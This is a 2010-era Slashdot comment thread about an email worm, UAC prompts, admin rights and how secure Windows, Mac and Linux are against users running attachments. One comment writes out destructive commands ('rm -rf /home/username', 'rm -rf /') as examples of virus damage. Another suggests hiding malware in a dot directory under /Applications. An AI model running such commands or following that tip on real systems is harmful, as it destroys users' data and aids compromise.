Well, in the case of Windows XP and common corporate practices, it's not unusual for an individual that would require administrative rights to log in with an account in the Administrators group on a regular basis, whether administrative tasks will be performed or not. I've worked for companies where 1 in 3 users have administrative rights on their workstation due to a "business need" which may have been a one-time task, but the escalated privileges remain indefinitely. 1 in 3 is an awful lot of people in a company with over 100,000 employees.

Re:The hell?

[goodmanj]

I know this has been said before, but if your operating system is asking for an admin password often enough that replacing it with a mouseclick significantly improves the user experience, you're solving the wrong problem.

Re:The hell?

[tepples]

Are there really people crazy enough to use operating systems released in 2001 in 2010?

Are there really people crazy enough to play video games released in 1980s in 2010? If a 2001 OS is the only thing that will run your application properly, you run the 2001 OS.

Re:The hell?

[Skuld-Chan]

You can't write files to \windows\system under vista/windows 7 without elevation to administrator. Under XP/2000 as a regular user - ditto.

That said - there's probably an alarming amount of people who would enter credentials upon getting the elevation prompt on Mac/Windows/Linux after clicking on an attachment or link in their email client.

Re:The hell?

[Blakey+Rat]

They all do, if you configure them to. Using the default configuration? None of them do.

Note that this virus is mostly affecting people running a 2001 OS (Windows XP), not a 2010 OS (Windows 7). Vista and Windows 7 users are pretty well-protected from this virus, using the default configuration.

(Of course you weaseled around that one by saying "in use in 2010", but I felt it was only fair to point it out anyway. Hell, Windows 3.11 is "in use in 2010".)

Re:The hell?

[93+Escort+Wagon]

I still don't get why more Mac users don't do this - running as a non-admin is trivially easy on the Mac. You don't even have to think about it - the OS will prompt you for an admin username/password when necessary (unlike Windows, where you still have to manually select "run as admin" I believe).

Better security with absolutely no pain. What's the problem?

Re:The hell?

No question is stupid!

Of course all modern operating systems require administrator privileges to modify such files, however, most viruses circumvent this through some kind of exploit in the operating system or in a admin-privilege-granting application (e.g., sudo). There are many examples of such attacks on all modern platforms (even cell phones!) So do not believe that just because your operating systems only represent a small faction of the computer systems in production today (and thus are less of a target for attackers) that you are somehow immune to such problems.

Re:The hell?

[Missing.Matter]

And if these users were on Linux they'd happily bang away their password when prompted.

Re:The hell?

[Sir_Lewk]

OS is the only thing that will run your application properly, you run the 2001 OS.

Not for checking your email it isn't. Unless of course you are a fucking moron.

Re:The hell?

[Missing.Matter]

The default UAC behavior in Windows 7 is to notify when installing programs and when programs try to change protected Windows settings on their own. The ONLY time I see a UAC prompt is when I install software. How is this unreasonable?

Re:The hell?

[Haeleth]

Yeah, but if you've got any sense, you run it in a sandboxed virtual machine, or as a dual-boot option that you only fire up for that one application, or on a separate heavily-firewalled computer that does not have direct access to the internet and is never used for anything else.

It remains that using a 2001 OS as your primary desktop environment in 2010 is at best naive, and at worst foolhardy.

In any case, the number of games that don't work in DosBox OR VirtualBox OR Windows 7 is vanishingly small.

Re:The hell?

[Missing.Matter]

If the user is hell bent on installing anything he wants on his system, no operating system will stop him.

Re:The hell?

[TrancePhreak]

Applications can be built admin-rights aware for windows (where it asks to elevate as necessary). Problem is, not everyone knows how. Fortunately, most installers often have this built into their mechanisms.

Re:The hell?

[bertoelcon]

OS is the only thing that will run your application properly, you run the 2001 OS.

Not for checking your email it isn't. Unless of course you are a fucking moron.

Checking email isn't the only thing people do on computers these days.

Re:The hell?

[Sir_Lewk]

If you want to use a decade old operating system to play your little games or whatever, then by all means go for it.

But don't check your goddamn email with it! Use a separate install with a secure operating system for that. Doing anything else is damned near criminal negligence.

Re:The hell?

[tepples]

Yeah, but if you've got any sense, you run it in a sandboxed virtual machine

For one thing, the upgrade from Windows XP to Windows 7 on a given PC costs money, as does the purchase of a retail Windows XP license if you replace your PC that came with an OEM copy of Windows XP with a new PC that came with an OEM copy of Windows 7. For another, how well do VirtualBox and friends handle DirectX graphics or OpenGL?

Re:The hell?

UAC in Vista is not the culprit for the "Yes" response. People were ingrained with this Pavlovian response long before UAC was introduced.

Re:The hell?

[ascari]

Yup, Windows and - ta da! - Mac OSX

Re:The hell?

[UnknowingFool]

The crux of the problem is why didn't people upgrade. Personally I think you can blame MS. If Vista hadn't been a debacle requiring major hardware upgrades for very little gain, many companies would have ditched XP already. Most companies I know are just now upgrading to Windows 7. Of course there are people who don't want to buy new computers that still (more or less) work. Nothing you can do about those people until the computer suffers an irrecoverable crash.

Re:The hell?

[Sir_Lewk]

For one thing, the upgrade from Windows XP to Windows 7 on a given PC costs money

Newsflash: keeping things maintained and safe costs money. Or let me guess, you are one of those people who also neglects to keep their car in good safe working order as well?

how well do VirtualBox and friends handle DirectX graphics or OpenGL?

Well.

Re:The hell?

[djlowe]

Granted M$ made it easier by not requiring one to actually type in any actual password to elevate privileges.

And, knowing this, the solution is simple: Create a separate, non-privileged account for daily use. When UAC prompts for rights escalation, the user is then forced to enter the username and password of a privileged account.

Sure, it takes a little longer to set up initially, and is slightly more cumbersome in use, but it works.

In a Windows Active Directory (AD) environment, I prefer to set things up as follows: Each user computer has a local Administrator-equivalent account for MIS - this account only exists on local computers and has no domain privileges. The primary user's AD account is a standard, non-privileged user on their local computer. In addition, there's a local-only account for the user that has Administrator rights, but has no domain rights - we use the convention of "'username'.local" for this - Joe User's AD account name is juser, his local Administrator-equivalent account is "juser.local". Users needing to install software, etc., escalate privileges via UAC using this account when logged in with their AD account.

The end result is a complete separation of privileges between local and domain accounts: None of the local Administrator-equivalent users have domain privileges and none of the domain users have local Administrator privileges. [1]

When a user, logged into their computer with their AD account, needs to install software, they escalate to their .local Administrator account via UAC and install it, and run it once to ensure that any post installation changes (to the Registry, for example) that require rights are done. Then they can exit the software, and run it as "themselves", using their AD account - since it has read-only rights to the software by inheritance, and user data is stored in their local profile directories (to which they already have full rights), nothing else needs to be done.

One handy trick: You can use ".\'username'" to force Windows to look for the user account on the local computer when logged in as a domain user, so for a user logged in with their AD account, using the example above, UAC escalation would be done using ".\juser.local".

It takes a little getting used to, but isn't all that cumbersome.

Astute readers will note that such a scheme cannot stop a user from willfully typing their local Administrator username and password, and so won't stop them from running an executable attached to a mail message... to which I reply: "You can lead a horse to water, but you can't make him do the backstroke". *grin*

Regards,

dj

Notes:

[1] The one exception to this is a domain administrator account, which has full Administrator rights to both the domain and the local computers. We handle this by issuing separate domain admin accounts to MIS personnel, and insist that 1) The passwords be different from the person's daily-use domain account and 2) Strongly discouraging anyone from logging into users computers using domain admin accounts to do service - we prefer that people in MIS login locally using either the MIS account (for work that requires local admin rights but no domain access), or into the domain using their daily use domain account and then escalating privileges as needed. One of the nice things about this, for me at least, is this: It acts as a self-enforcing check and reminder - I find that it creates a constant awareness of how I'm logged in, wherever that may be, which leads to me keeping security in mind as I work.

Re:The hell?

[paedobear]

If you're talking about virtualisation on Windows 7, it comes with a free license for XP (and your choice of preinstalled images...)

Re:The hell?

[tepples]

Newsflash: keeping things maintained and safe costs money.

And the global economy went into recession two years ago. Computer maintenance is one of the things that gets neglected: as long as it still runs Facebook, it still "works".

Or let me guess, you are one of those people who also neglects to keep their car in good safe working order as well?

Members of the general public have more experience with the maintenance requirements of gasoline-powered cars than PCs.

Re:The hell?

[goodmanj]

I (the snarky Mac-loving OP) actually like Windows 7: its UAC behavior, like so many other things, is just like a Mac. My snide comments were directed less at Microsoft in general and more at XP fanatics who were so traumatized by Vista that they'll never touch another OS ever again.

Re:The hell?

[c6gunner]

Hell no! I mean, yeah, they'd do it, but they wouldn't be happy about it :) Remember all the bitching when Vista first started asking them to allow or deny? I can just imagine the whining that would happen if they had to type in a password each time!

Re:The hell?

[Sir_Lewk]

Members of the general public have more experience with the maintenance requirements of gasoline-powered cars than PCs.

Ignorance is the problem, not the excuse.

Re:The hell?

[shutdown+-p+now]

You don't need to write anything to a system directory to set it up so that a trojan runs when the user logs in, and starts sending mail. Neither in Windows, nor in Mac OS, nor in a typical Linux distro (last I checked, Ubuntu happily let me +x files in ~).

That said, Vista and above would prompt just like OS X does. Problem is, users are conditioned to ignore all those prompts and just click on any button that looks like it will let them proceed with doing what they think they want to do. As a Linux/Mac user, just be glad that your platforms aren't targeted by these kinds of attacks anywhere near as often, because they are just as suceptible to user error. The only approach that truly guards against this is iPhone-style "walled garden" where the user is presumed to be an idiot incapable of making any security-related issues.

Re:The hell?

[jeffasselin]

The problem with Vista's UAC is that it would ask you your admin password to change the desktop wallpaper. I'm exaggerating slightly, but it was almost that bad. Windows 7's is decent, and asks only when you actually want to run things as admin, install software, change system settings, etc.

Re:The hell?

Did you even try your own example? Or are you running OS X 10.0 or something? If you are running a modern and supported version of OS X, meaning either 10.5 or 10.6, have you upgraded it repeatedly from OS X 10.1 or earlier? Have you added your account to wheel?

Yes you can write to / which isn't a system directory, although it is outside the user's home directory. Admin accounts are not members of wheel by default and haven't been since roughly the turn of the millennium.

For anyone running OS X, try:

touch /System/testfile
touch /bin/testfile
touch /usr/bin/testfile

Hint: it won't work unless you're doing something unusual. To write to those places you'll still need to authenticate.

Re:The hell?

[Lucky75]

Sure, that works. Unless you're at an office where IT is way behind the times and there is too much infrastructure in place to upgrade operating systems faster than 3-4 years after they are released. It's the same reason why lots of businesses still support IE 6 (or did until very, very recently) as the only browser.

Re:The hell?

[Lucky75]

To add to that, the only people that really know better and can get around all of the "officially supported" crap are the people who probably wouldn't fall for such things in the first place.

Re:The hell?

[Sir_Lewk]

In both cases, the extreme negligence of the computer administrator is the present. Doesn't matter if this is in someone's home, or in an office.

Re:The hell?

[DAldredge]

Yes. Linux, OS X and Windows to name a few if you use the correct vulnerability.

Re:The hell?

Are there really people crazy enough to play video games released in 1980s in 2010?

Yes, and salvation appears in the form of DOSBox.

Re:The hell?

Linux 2.4 was released in 2001 and it is rather widely used still.

Re:The hell?

[heffrey]

UAC does require password if you are a standard user which should be the norm on a corporate site.

Re:The hell?

[jimicus]

You don't need to, you can execute a program from anywhere in most operating systems. Hell, remarkably few Linux distributions default to mounting /home and /tmp with the noexec option.

Re:The hell?

[tepples]

Ignorance is the problem, not the excuse.

How do you propose to solve the problem, other than by forcing all publishers of proprietary PC operating systems to make operating system licenses portable from one PC to a virtual machine on the PC's replacement?

Re:The hell?

[tepples]

Are there really people crazy enough to play video games released in 1980s in 2010?

Yes, and salvation appears in the form of DOSBox.

In addition, are there really people crazy enough to play video games released in the late 1990s in 2010?

Re:The hell?

You can't write files to \windows\system under vista/windows 7 without elevation to administrator. Under XP/2000 as a regular user - ditto.

That assumes that the user is set up as a limited account. This may be true on machines in a domain that are centrally administered, but what about the home machine someone uses to check email? Further, what about someone that has Outlook installed on that home machine to check work email from home?

Re:The hell?

[DigitalSorceress]

Exactly!

UAC is "the boy who cried 'Wolf'", but it's only a symptom of the bigger underlying problem: Too many things that SHOULDN'T need admin level access DO need it in Windows.

My MacBook asks me for my admin password every now and then, but not nearly as often as a Windows Vista box pops up the UAC confirmation.

Re:The hell?

[StuartHankins]

Perhaps attacking the problem from the ISP side would be easiest and most productive. The problem, after all, is one of pollution -- in this case polluting the network with traffic. You can't continue to drink from the river if the polluter isn't stopped.

One possible approach is temporary disconnection from the public internet for any personal internet account found to be sending spam or engaging in virus-like activity.

Nowadays when starting a new broadband account, the ISP sends you to their startup page to complete the registration process. Instead of sending them there, send them to a "you are infected" page with AV downloads available from the ISP. This would only work with personal accounts, for businesses the concept wouldn't work. But I'd have to guess that most of the people getting infected are home users, and this could drastically reduce the number of computers available for any botnet, rendering it less profitable.

Re:The hell?

[JeffSpudrinski]

Your comment can be taken several ways since you didn't clarify what you conside to be the real problem.

The argument that Linux and Apple did this and it made it more secure isn't exactly true. It's that, traditionally, more tech savvy users were using Linux and Apple and less cautious users were using Windows. Now that Apple and Linux is becoming more commonplace, the same issues will start applying to those OSes.

Users are still not very cautious, so you can blame Microsoft for users clicking OK or YES on every window that pops up just so they can go back to playing their web based game, or email, or whatever. I would guess that >90% of users out there don't bother reading pop up messages.

You can't blame Microsoft, Apple, or the Linux community for that any more than you can blame the Department of Transportation when someone runs a stop sign and gets in an accident.

Microsoft did good catching up with the other prevalent OSes security. You can't blame the OS creator when users blow right through all the warnings.

Just my $0.02.

-JJS

Re:The hell?

[JeffSpudrinski]

Oops...

Third paragraph should have read "can't blame Microsoft".

Re:The hell?

[al0ha]

That has no relation to the original question which related exactly to creating files in the root files ystem without having to enter a password.

Re:The hell?

[al0ha]

Not true. Create the Hello World perl script below in /

#!/usr/bin/perl
print "Hello World\n";

####### end perl script

cd /
vi myperlfile.pl
chmod 755 myperlfile.pl
./myperlfile.pl

You have now created a simple executable in / owned group admin without using a password

Re:The hell?

[al0ha]

True, however you can write to anywhere in

/Library
/Applications

Great way to p0wn a system is to write malware to a . directory in /Applications or /Library

Bottom line is Macs are a susceptible to malware as Windows systems, unless on each system you specifically choose to create a second account without admin privs to use for general computing purposes

Re:The hell?

[Abcd1234]

The OP phrased his question poorly.

To actually implement an exploit, just being able to write to a system directory isn't sufficient, and being able to do so doesn't indicate a security issue. As is the case with this exploit, you need to be able to replace system binaries with infected versions, hence my question.

Re:The hell?

[Skuld-Chan]

By default ALL Windows 7 and Windows Vista accounts are limited accounts.

Re:The hell?

[drsmithy]

I know this has been said before, but if your operating system is asking for an admin password often enough that replacing it with a mouseclick significantly improves the user experience, you're solving the wrong problem.

From the common-case scenario of a single-user desktop, the difference in terms of security between clicking a button and typing in a password is so close to zero it's irrelevant.

Re:The hell?

[drsmithy]

And, knowing this, the solution is simple: Create a separate, non-privileged account for daily use. When UAC prompts for rights escalation, the user is then forced to enter the username and password of a privileged account.

It makes no difference. People will happily type in the password (and user if required). The only difference is that one scenario takes half a second and is marginally annoying, and the other takes 2 seconds and is marginally more annoying.

Re:The hell?

[Haedrian]

If I can click a button, a virus can click a button, or a co-worker who saw that I left my computer unlocked.

UNIX was designed to be multi-user. So if user X is working on the machine, he shouldn't have admin control. It would be stupid to ask him to click a magic button. You'd need an admin.

Always being admin goes against the principle of least privilages. Which means that Windows' solution is only useful as a "Oi mate, you know what you're doin?"

What do you mean 2001?

[Superdarion]

What do you mean it's 2001 all over again? I never stopped receiving those. Every once in a while I receive a mail "from a friend", from the friend's address or not, telling me stuff like "Hey, here are the pictures of that party!" or "Have you seen this? I can't believe there are pictures of it!". They all contain links to weird-looking pages which, of course, I never open.

Sometimes I even receive those mails with URLs that actually contain my email address, like www.thisisnovirus.com/picturesfromlastnight/superdarion.

From what I can tell, they usually come from my friend's MSN/hotmail's address books.

Re:What do you mean 2001?

[istartedi]

It's even more interesting to look at packets with a sniffer on Comcast. Something out there is still broadcasting UDP on this subnet. IIRC, there was a Windows service that used to be enabled by default, that allowed you to send simple UDP messages and have them pop up at people. AFAIK It's long since been disabled; but you still see that kind of traffic on the network. Guess what, it's all spammy messages too. How many unpatcheable '98 or even '95 boxes are on the network?

Also, I defy any Linux user to come back and say that a 12 year old distro wouldn't be an absolute cess pool if it were that popular.

Along similar lines, people still use Outlook? What if you need to log in from somebody else's box? I'm not a big fan of "web apps for everything", but email is one of those things where a web app makes much more sense than a desktop app.

Re:What do you mean 2001?

[Dalzhim]

They all contain links to pages (probably weird-looking) which, of course, I never open.

Here, fixed that for you.

Re:What do you mean 2001?

[afabbro]

Along similar lines, people still use Outlook? What if you need to log in from somebody else's box? I'm not a big fan of "web apps for everything", but email is one of those things where a web app makes much more sense than a desktop app.

Not to defend Outlook, but MS Exchange does come with Outlook Web Access. It provides a web-based interface that provides a web 2.0 interface to Outlook. Probably 90% of what you want to do in Outlook (read/writeyour mail, setup meetings, contacts, etc.) can be done in OWA. It even degrades nicely for older browsers. It's actually quite a sophisticated webapp...though of course, you're still using Outlook.

Re:What do you mean 2001?

[DrSkwid]

Do you have any pictures of my wife you could send me in a zip file, or perhaps a failed UPS delivery summary ?

Re:What do you mean 2001?

[scdeimos]

[on OWA] It even degrades nicely for older browsers.

I wish it downgraded nicely for newer browsers, too.

Re:What do you mean 2001?

Being the origins of the XMLHttpRequest feature that has since brought us wonders such as Gmail and Maps, one might say that Outlook Web Access was the first true webapp. It's not surprising that they've got a head start on things.

Re:What do you mean 2001?

[DrugCheese]

Not to defend Outlook, but MS Exchange does come with Outlook Web Access. It provides a web-based interface that provides a web 2.0 interface to Outlook. Probably 90% of what you want to do in Outlook (read/writeyour mail, setup meetings, contacts, etc.) can be done in OWA. It even degrades nicely for older browsers. It's actually quite a sophisticated webapp...though of course, you're still using Outlook.

That may help defend against being a carrier, but the payload has already been delivered to the computer by then.

Re:What do you mean 2001?

[gbjbaanb]

Sod OWA, there's only 1 good use for it: DavMail

this is an app that sits on your PC acting as a gateway between OWA and Thunderbird (and Lightning if you want to use your Outlook calendar too). It can also run on a server and act as that gateway for all users on your network.

The only thing you miss is the 'push' email as its sent, but I find my corporate Outlook/Exchange environment takes a good while to transmit emails across the firewalls anyway so its no loss that you have to (automatically, in the background) poll for new mail regularly.

Re:What do you mean 2001?

[LordLimecat]

It even degrades nicely in older browsers...

...And in any browser that doesnt state "internet explorer" in its useragent.

Re:What do you mean 2001?

[treeves]

Reminds me of Benny Hill:

1: Have you got any naked pictures of yer wife?
2: No!
1: Would you like some?

Re:What do you mean 2001?

[OnePumpChump]

Has Hotmail itself actually been compromised in this way? (I mean, after they switched to Windows, it wouldn't surprise me) Because I've gotten this from people who swear to me that they stopped using Outlook after the last time.

Re:What do you mean 2001?

[MrCrassic]

Only Exchange 2007 and above have that nifty AJAX-based webmail client. OWA on Exchange 2003 is way different and pretty terrible in comparison.

Re:What do you mean 2001?

[dbIII]

It even degrades nicely

That's a new feature for MS Exchange. It used to degrade quite nastily in previous versions.

Re:What do you mean 2001?

[CaroKann]

In this day and age, you would think it would not be possible to download and install a program simply by clicking on an email link. I would have thought Microsoft would have taken that 'feature' out 8-9 years ago.

Re:What do you mean 2001?

Most OWA servers are preconfigured to enable ActiveSync for phone or client usage (Android and iPhone support ActiveSync), and RPC over HTTP, which allows you to use it like a normal IMAP and SMTP server in supported mail clients. See Microsoft's Exchange remote test.

Re:What do you mean 2001?

[Eskarel]

Outlook Express also doesn't exist in any version of Windows past XP.

XP is an insecure badly designed PoS, but everyone clings to it like it's their dying grandmother.

Re:What do you mean 2001?

[Johnno74]

And another useless factoid is the team behind Outlook Web Access invented AJAX. (call it web 2.0 if you are that way inclined)
(but wait, I thought microsoft never did anything truely innovating...)

They wrote an ActiveX control for IE 4 to do asyncronous http requests that could be called from client-side scripts on the page for OWA in exchange 2000. Microsoft saw the potential in this, and added support for XMLHTTP into IE 5. It was quite a few years until the rest of the world woke up to the potential of this technique, and AJAX really took off.

You can read the full history of OWA here.

Re:What do you mean 2001?

[Tablizer]

I suspect that there's a link that says something like, "Click this to install the party photo viewer", and the user confirms install.

Re:What do you mean 2001?

[KingAlanI]

RIT used to have an Exchange server (switched to hosted Gmail, thankfully); I actually foung the basic interface, what I saw in Firefox, easier to use than the full interface that showed up in IE.

Re:What do you mean 2001?

[cbhacking]

I assume you're just shooting for a "funny" mod, since even Internet Explorer doesn't contain the words "Internet Explorer" in its user agent string.

However, your post is also factually incorrect; OWA in recent Exchange versions works with the full experience on Firefox, Safari, and possibly other browsers as well.

Re:What do you mean 2001?

[cbhacking]

If you mean you'd prefer to not use the AJAX-y interface, there's a "light" (plain HTML) mode option right on the login screen.

Re:What do you mean 2001?

[daid303]

though of course, you're still using Outlook.

Beats using Lotus Notes as email client. *curses at work*

Re:What do you mean 2001?

[phaunt]

They all contain links to weird-looking pages which, of course, I never open.

If you never open them, how do you know the pages look weird? Or did you mean to write "They all contain weird-looking links to pages which, of course, I never open"?

Anyway, I believe many of those work on a slightly different principle: not downloading an EXE but simply asking you to enter your MSN/hotmail password to be able to see the embarrassing pics in question... and then mailing /IM'ing themselves on.

Re:What do you mean 2001?

It might be "web 2.0" in IE, in Chrome it's a piece of crap that you have to hit F5 on to get new email, and which logs you out after an hour or so (yeah coz I never leave my email open). Is Chrome an "older browser" then?

Never seen a more clunky webmail interface in my life. Looks kinda like Office though.

Re:What do you mean 2001?

[Pharmboy]

The devil you know is better than the devil you don't. And while I like Windows 7 much better than XP, there is still a lot of software that simply will not work right on 7. We use Peachtree 2004 at the office (ugghhh..) but it is what we use and the boss will not have any part of changing it. It runs at about 20% speed, on faster hardware, and isn't stable. The only reason for computers in the office is to run that application, and email, so it doesn't matter what the OS is as long as it will do that, so we have to stick with XP.

And yes, I have tried Wine on Linux, but it is documented to NOT work with Peachtree 2004 specifically, due to the messed up implementation of Btrieve, so it isn't an option.

Re:What do you mean 2001?

By "degrades nicely for older browsers" you mean "Doesn't work in ANY version of Firefox or Chrome", right?

Re:What do you mean 2001?

Really? The last time I tried was about 3 months ago. Then I caved in and started using Thunderbird again (jesus, what decade is this that I have to use a desktop mail client?)

Then again, being Exchange, I guess the upgrade would be dependent on my company's Exchange provider updating to whatever new version supports browsers other than IE?

Re:What do you mean 2001?

[ConceptJunkie]

The plus side is that Exchange's web access is not slower than using Outlook.

The minus side is that Outlook is so absurdly slow that's not saying much.

Re:What do you mean 2001?

[Eskarel]

And if you've got a real legitimate reason to hang onto it, that's fine(though the professional version of 7 comes with a quite reasonable 32 bit XP emulation layer which might be worth looking at.

My issue is with the foaming at the mouth types who constantly criticize Microsoft for not having any major advances in their operating system since 2003, while continuing to use an operating system from 2003 for no real reason.

Re:What do you mean 2001?

[LordLimecat]

That is incorrect. All non IE browsers get "OWA-Lite", ie, "OWA made as crappy as we can without pissing off our users too much". It is better in Exchange07, but it is STILL lite mode.

U R teh winnar!

[drcheap]

Sigh. We need licenses to operate computers, that way we can revoke them when people click on the shiny red buttons.

--
Click to read more great comments: ILoveSlashdot.exe

Re:U R teh winnar!

[Pentium100]

Because there is no way for a virus to spread on a Linux machine.

Even assuming that Linux does not have security bugs and the user runs as user and not root, the virus can still:
1. Access all of the users files.
2. delete them (rm -rf /home/username )
3. Send itself to every email address it could find in the users files.

For a single user machine, rm -rf / and rm -rf /home/username is about the same in the damage.

Yes, most of Linux users now are the ones that know what they are doing and would be able to stay clean even using Windows. If, say, everyone goes to Linux, the "oh, look, my friend sent me a screensaver " users and virus creators will go too and Linux will have the same problem as Windows do now.

For now, the number of Linux users, not to mention the number of stupid Linux users is too low for the virus writers to care (why spend time to create a virus that works for 5% of people, 90% of whom know how to protect themselves, when he can create a virus that works for 90% of people a lot of whom will run it).

I use both Linux and Windows, my opinion is that both operating systems have their own advantages and disadvantages, but both are good at what they do, especially Linux for servers or work computers that need a browser and OpenOffice.

Re:U R teh winnar!

[_Sprocket_]

Now Timmy... can you tell me which of the shiny... candy-like... red buttons has an electric current on it's surface? Ooooh. Sorry. It WAS a trick question. They all do. We're going to need another Timmy.

Re:U R teh winnar!

[DrSkwid]

How did this virus write itself with execution privileges ?

Re:U R teh winnar!

[EvanED]

Not just that, but it could set itself to run each time the user logs in. This is less damaging than putting it into a system folder, and it would save quite a few people. That said... what percentage of desktop computers are or essentially are single-account machines? I'd guess easily 3/4 of them, and probably more like 85 or 90%. Between people who actually have their own computer (e.g. they live alone), share accounts between everyone in a family (I would guess most "normal" people, though I'm not sure), machines where there is a de-facto single user (e.g. almost all "personal" workstations in company settings), and the general increased prevalence of computers (especially laptops), I'd say that a very substantial majority of the time, compromising one account is basically the same as compromising the system.

Re:U R teh winnar!

[EvanED]

Among several possibilities, "unzip this and look!"

~/delete : cat > hello.sh
#!/bin/sh
echo Hello!
~/delete : chmod +x hello.sh
~/delete : tar cvf hello.tar hello.sh
hello.sh
~/delete : gzip hello.tar
~/delete : zip hello.zip hello.sh
  adding: hello.sh (stored 0%)
~/delete : cp hello.tar.gz hello.zip ~/public/html
~/delete : rm *
~/delete : wget [...]/hello.tar.gz
--2010-09-09 18:05:50-- http://.../hello.tar.gz
Resolving pages.cs.wisc.edu... 128.105.7.26
Connecting to pages.cs.wisc.edu|128.105.7.26|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 158 [application/x-gzip]
Saving to: `hello.tar.gz'
[...]
2010-09-09 18:05:50 (25.1 MB/s) - `hello.tar.gz' saved [158/158]
~/delete : tar xvf hello.tar.gz
hello.sh
~/delete : ./hello.sh
Hello!
~/delete : rm *
~/delete : wget [...]/hello.zip
--2010-09-09 18:06:16-- http://.../hello.zip
Resolving pages.cs.wisc.edu... 128.105.7.26
Connecting to pages.cs.wisc.edu|128.105.7.26|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 170 [application/zip]
Saving to: `hello.zip'
[...]
2010-09-09 18:06:16 (27.0 MB/s) - `hello.zip' saved [170/170]
~/delete : unzip hello.zip
Archive: hello.zip
  extracting: hello.sh
~/delete : ./hello.sh
Hello!

(And no, using something like file-roller won't help you here.)

Re:U R teh winnar!

[Pentium100]

Well, there has to be a way for a user to execute an email attachment or a downloaded file. If the user wants the screensaver (or whatever) that he found on some site or got from his "friend", he will check the checkbox that says "allow execution" (or similar).

Kind of the same happens with Windows. The user has to download the executable file and run it ignoring two warnings (one from firefox and another one from Windows).

Re:U R teh winnar!

[CannonballHead]

You mean to say that the same stupid users that open attachments that look amazingly similar to other viruses won't get the popup that says "you can't execute that without [explains how to set executable bit]" and do it? Or won't get a "please enter the root/administrator/whatever password" prompt and simply put it in?

Unless you want to have the end-user never manage their own computer (i.e., not even KNOW the root password)... well, no OS I know of prevents a user from allowing a virus to do bad things. Some make it a bit harder.

Re:U R teh winnar!

[Erikderzweite]

To play the devil's advocate — a sufficient motivated user is always able to set privileges to the downloaded file.
Yet you have to keep in mind that ex-Windows users are the ones who is more vulnerable to this as in Linux we have repositories as a standard way of installing software, not download-n-run Windows-way. In Windows, users are trained to download and launch shit (and to click yes if asked), Linux users are trained to start software manager. So there will be a statistically significant number of Linux newbies who won't fail for that trick provided they don't have fresh memories of less elegant systems.

A competent administrator would probably just noexec the users into oblivion (although that will create some unwanted side-effects). How many will be able to invoke a shell manually?

Re:U R teh winnar!

[TimSSG]

I answer programming question on a IDE forum; and the number of ignorant Linux users is on a sharp increase in the past 3 years. It used to be you could assume the ignorant programmers were on windows, no longer. Tim S.

Re:U R teh winnar!

[Un+pobre+guey]

Licenses for computer use are absurd. What next, for using cell phones (which are computers)? For using any net-connected device in the future that can be configured enough by users to potentially cause mayhem on the network? How many licenses per day per office would need to be processed? If it must be done online then 1) you would already need a license, and 2) it would probably involve a falsifiable process, thus rendering it into little more than a nuisance and yet another use tax and thus pointless. It has been demonstrated repeatedly, beyond a shadow of a doubt, and on a vast scale that making things illegal does not generally constitute a robust solution.

Re:U R teh winnar!

[Pentium100]

A competent administrator most likely could secure Windows so the user cannot run the virus anyway.

However, a lot of computers are used at home, by one or more people sharing accounts where they know only the most basic things and ask a nerd friend when they have problems or take the computer to a repair shop. You know, a lot of people cannot install Windows even though they can read and understand the setup (also, "Hi, I have a problem with my computer, it displayed some error and now does not work. No, I do not remember the error, but maybe you know what could be the problem?").

They will have root access to their computer (needed for apt-get or synaptic), but may run as a standard user. They will still download and run things (while most of the software is installed using repositories and apt-get or similar software, some things still have to be downloaded as .deb, .rpm, .sh or .tar.gz files, for example Canon scanner drivers, Firefox on Debian and nVidia display drivers (not sure about that though).

Re:U R teh winnar!

I guess that what we need is a more restrictive security model, where each program, by default, is able to write only to /home/username/.programname. Trusted programs would need to be able to access /home/username, and a malicious program might trick the user into trusting them, but it's an extra layer of defence - "Why does screensaver.exe need access to my files?"

Basically, sandboxing should be the default.

Re:U R teh winnar!

[Erikderzweite]

>A competent administrator most likely could secure Windows so the user cannot run the virus anyway.
As seen from other comments, NASA does not have competent administrators. Nor does the Pentagon given the 2008 outbreak. Ether the bar of competency is too high for those or it is not that easy as you clame. Just sayin'.

>some things still have to be downloaded as .deb, .rpm, .sh or .tar.gz files
Some few is still much better than all of them.
As newbies aren more likely to use Ubuntu then Debian, Firefox and Nvidia are already covered. Not 100% sure about Canon, but I think that my gf's MFU from Canon worked without the need of manual installation with Lucid.
Besides, Canonical tries to put commercial software to the install manager as well. With them being the biggest desktop vendor it is yet another step towards security.

Re:U R teh winnar!

[dbIII]

Because there is no way for a virus to spread on a Linux machine.

I'm sure there are plenty of ways but that doesn't change the situation where the malware swamp is still an MS Windows exclusive problem.
My theory is that linux learnt from the all the years of students running a variety of exploits on unix while the Microsoft platform for some unknown reasons did not want to learn from the errors of the past.
For the last few years they've had no choice but to learn from those mistakes but there is a lot of catching up to do. We'll probably see SElinux style protection on MS Windows soon (ie. if the app is behaving in a way that is not on the list don't let it run - deny by default) instead of trying to protect by just having a list of what is not allowed (allow by default). Having a virus definition list doesn't help the first few computers that get a new virus that is not yet on the list.

Re:U R teh winnar!

[Pentium100]

Well, I chose Debian because a version stays current a long time (and supported even longer), unlike Ubuntu, which probably has a new version released faster than service packs for Windows. Still, the most secure way is the way Apple does on their iP(ad|od|hone)s, but I do not like it, I'd rather face the risk of a virus (or rather a worm - I have not seen an actual virus (that infects other files instead of being a separate file) for a long time) than be told by some company what programs I can and cannot run on my computer (I don't think Apple does it for computers too, just the small devices).

As for NASA and Pentagon - I don't know the situation there, so I can't really comment about it, but you can on windows make the system drive read-only and deny execution of files from any other drives.

Re:U R teh winnar!

[Pentium100]

Also, as I said, Linux has small market share and a lot of the users know what they are doing, so it is less profitable to write a virus for Linux (or Mac, or Windows 3.11) than it is with Windows XP/Vista/7.

Still, "the worst a virus on Linux can do is delete all your documents, it cannot break the system files" is quite bad.

Re:U R teh winnar!

[Erikderzweite]

The interesting thing is: the Canonical seems to want to make some kind of an AppStore for commercial software on Ubuntu which will be integrated into software manager along with all the software from repositories. So you get the best of both worlds: the user can get everything from software manager, but does not have to.
Doesn't solve the problem completely, but it is the best one can get without losing essential freedoms.

Re:U R teh winnar!

If it's not in the Ubuntu Software Center, don't (#&@ing install it. Period. Even software you need to *buy* is in there now. That's what I tell my mom. If you need something that isn't there, you contact me and I'll check it out for you.

Re:U R teh winnar!

[dbIII]

That no longer holds - the market share is HUGE in the shape of ADSL modems that every spammer would love to have control of. Many of them are owned and have been set up by an MS windows user that has had or will get a computer virus. The main difference is that the defaults on these devices are not STUPID.

